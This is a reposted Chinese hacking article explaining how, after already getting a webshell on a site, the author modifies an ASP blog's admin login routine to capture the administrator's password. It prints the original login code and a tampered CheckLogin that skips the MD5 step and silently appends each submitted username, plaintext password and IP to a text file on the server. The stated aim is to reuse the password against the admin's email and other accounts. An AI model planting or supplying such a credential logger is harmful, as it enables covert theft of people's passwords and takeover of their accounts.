利用asp来记录管理员账号密码[网络技术]
本文“利用asp来记录管理员账号密码[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
asp记录管理员账号密码.
根源:www.54rk.cn
作者:拉伸
在一次安全检测中,其实已拿到了webshell了,但是我还要社工他的邮箱还有其他资料类,所以要得知道他的习性.
下载了数据库,但是md5密码没办法解密.唉,看来只要记录他的登录管理员 账号密码了!
免得还要去穷取法破解!
这个密码其实说重要也不重要 说不 重要 其实很重要.
因为很多人喜好利用相同密码.即便是我这类安全检测人员,也免不了利用同一种账号密码的习惯.
首先看看他的后台登陆代码
<%
Dim Login
Set Login=new AdLogin
Login.Execute
Class AdLogin
Private ExCommCls
Private Sub class_initialize
Set CommCls=new CommonCls
ExCommCls.IsIpAllow
ExCommCls.CheckInstall
ExCommCls.GetConfigCache("*")
End Sub
Private Sub class_terminate
Set ExCommCls=nothing
End Sub
public Sub Execute
Dim Action
Action=Request("action")
Select Case Action
Case "CheckLogin"
CheckLogin
Case "LoginOut"
LoginOut
Case Else
LoginF
End Select
End Sub
Private Sub CheckLogin
Dim Adname,AdPwd,CheckCode
AdName=ExCommCls.G(Trim(request("Adname")))
AdPwd=md5(Trim(request("AdPwd")))
CheckCode=ExCommCls.G(request("checkCode"))
If Trim(CheckCode)<>session("excheckcode") and Application(sn&"IsCheckCode")="是" Then
ExCommCls.ShowMsg "考证码错误!",Application(sn&"blogurl")&"admin_login.asp"
Exit Sub
End If
If Trim(AdName)=CStr(Application(sn&"AdName")) And Trim(AdPwd)=CStr(Application(sn&"AdPwd")) Then
Response.Cookies(Md5(SN))("AdName")=AdName
Response.Cookies(Md5(SN))("AdPwd")=AdPwd
session("AdLogin")=Md5(SN)
ExCommCls.GetConfigCache("*")
ExCommCls.GetClassCache()
Response.Redirect(Application(sn&"blogurl")&"admin_index.asp")
Else
ExCommCls.ShowMsg "帐号或密码错误",Application(sn&"blogurl")&"admin_login.asp"
End if
End Sub
Private Sub LoginOut
Response.Cookies(Md5(SN))("AdName")=""
Response.Cookies(Md5(SN))("AdPwd")=""
session.Abandon()
ExCommCls.ShowMsg "成功退出登陆",Application(sn&"blogurl")&"index.asp"
End Sub
Private Sub LoginF
%>
看下列代码
AdName=ExCommCls.G(Trim(request("Adname")))
AdPwd=md5(Trim(request("AdPwd")))
---意思很简单,这里就不明说了, 主要看md5 ,密码利用md5加密 这样的话,我们记录的密码也就没用了,还是md5.所以
所以想到了,一个钓鱼伎俩. 它本来的登录界面是
Private Sub CheckLogin
Dim Adname,AdPwd,CheckCode,StrLogText,ip,ff
AdName=ExCommCls.G(Trim(request("Adname")))
AdPwd=(Trim(request("AdPwd")))
CheckCode=ExCommCls.G(request("checkCode"))
strLogFile="test.txt"
IP=request("IP")
StrLogText=StrLogText&AdName&"----"&AdPwd&"----IP:"&IP&("REMOTE_HOST")
set f=Server.CreateObject("scripting.filesystemobject")
set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)
ff.writeline(chr(13)+chr(10)&StrLogText)
ff.close
set ff=nothing
set f=nothing
If Trim(CheckCode)<>session("excheckcode") and Application(sn&"IsCheckCode")="是" Then
ExCommCls.ShowMsg "考证码错误!",Application(sn&"blogurl")&"Admin_1ogin.asp"
以上是“利用asp来记录管理员账号密码[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |